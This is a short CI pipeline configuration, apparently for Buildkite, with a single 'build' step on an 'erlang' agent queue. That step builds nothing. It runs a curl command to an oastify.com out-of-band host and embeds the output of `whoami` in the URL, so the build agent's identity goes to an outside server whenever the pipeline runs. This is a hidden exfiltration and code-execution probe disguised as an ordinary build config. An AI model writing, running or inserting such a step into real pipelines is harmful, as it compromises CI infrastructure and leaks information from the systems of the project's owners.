steps:
  - commands:
      - "curl http://x31dhaqzkwcd7gi3y8gxksqg47a6yyymn.oastify.com/erlang/`whoami`"
    name: ":hammer: build"
    agents:
      queue: "erlang"
    artifact_paths:
      - "artifacts/*"
